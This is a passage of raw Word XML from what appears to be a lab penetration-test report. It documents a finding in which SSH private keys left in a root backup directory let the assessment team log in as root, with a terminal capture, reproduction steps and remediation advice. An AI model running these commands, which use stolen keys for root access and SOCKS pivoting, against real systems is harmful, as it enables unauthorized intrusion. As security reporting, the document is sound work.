                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>x  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4096 Apr 21  2019 .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31255F52" w14:textId="2507E9D5" w:rsidR="00055045" w:rsidRDefault="004E111C" w:rsidP="00055045">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E111C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E111C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E111C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E111C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Permissions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6AAC1" w14:textId="7098DC4C" w:rsidR="00055045" w:rsidRPr="00AC67FD" w:rsidRDefault="004E111C" w:rsidP="00055045">
      <w:r>
        <w:t xml:space="preserve">After downloading the stored SSH keys, the assessment team successfully signed into the root account using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E111C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> private key from the backup file. The terminal output is shown in the below figure.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00055045" w14:paraId="033A94B7" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="46212026" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)-[~/Desktop/Final]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FDB354E" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">└─$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -D 127.0.0.1:31337 root@10.10.0.66 -p 443 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ext-Box/keys/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1798F9EF" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">          Welcome to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B8FE65" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E0447D9" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ███╗   ██╗██████╗ ███╗   ██╗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354543E6" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ████╗  ██║██╔══██╗████╗  ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4A8FF8" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██╔██╗ ██║██████╔╝██╔██╗ ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7081E685" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██║╚██╗██║██╔══██╗██║╚██╗██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42757CD2" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██║ ╚████║██████╔╝██║ ╚████║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30424B8C" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ╚═╝  ╚═══╝╚═════╝ ╚═╝  ╚═══╝</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5909BB" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>**Near-Earth Broadcast Network**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10482809" w14:textId="43FECD5A" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  *Someone is Always Watching*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58CC1071" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B34AB00" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4920335E" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Penetration testing with permission only!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1A33F7" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Last login: Sun </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apr  4</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21:45:09 2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4860F9" w14:textId="77777777" w:rsidR="004E111C" w:rsidRPr="00F62F5D" w:rsidRDefault="004E111C" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>root@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5379D058" w14:textId="03FAB913" w:rsidR="00055045" w:rsidRDefault="00F62F5D" w:rsidP="004E111C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="004E111C" w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7967F4A9" w14:textId="3C69CC96" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00455A9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oot Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73620691" w14:textId="55BEDB59" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00055045">
      <w:r>
        <w:t xml:space="preserve">An attacker with access to a user account on the device would be able to escalate their privileges to those of the root user using the keys stored in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>irectory</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2C5F7" w14:textId="77777777" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534E8B2" w14:textId="18555CD7" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and store the SSH keys on the attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B5D5D" w14:textId="371D16A0" w:rsidR="00455A9D" w:rsidRPr="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access the root account through SSH by using the following command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> root@10.10.0.66 -p 443 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>id_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6188235F" w14:textId="0007B7B1" w:rsidR="00D36E2B" w:rsidRPr="00D36E2B" w:rsidRDefault="00055045" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="15"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1837C" w14:textId="7DD21791" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access controls and permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The first step to preventing information disclosure through backup files is to ensure that access controls and permissions are properly configured. Access to backup files should be restricted only to authorized personnel who need it to perform their job functions. This can be done </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access controls, such as file system permissions, ACLs, and RBAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B4B1A" w14:textId="137DE2D3" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encryption and secure storage:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Backup files should be encrypted and stored in a secure location to prevent unauthorized access. Encryption can help protect the data in the backup file from being accessed or read by unauthorized parties, even if they manage to gain access to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2C319" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D"/>
    <w:p w14:paraId="4C46C314" w14:textId="77777777" w:rsidR="00055045" w:rsidRDefault="00055045" w:rsidP="00055045">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="15"/>
      <w:r w:rsidR="00455A9D">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
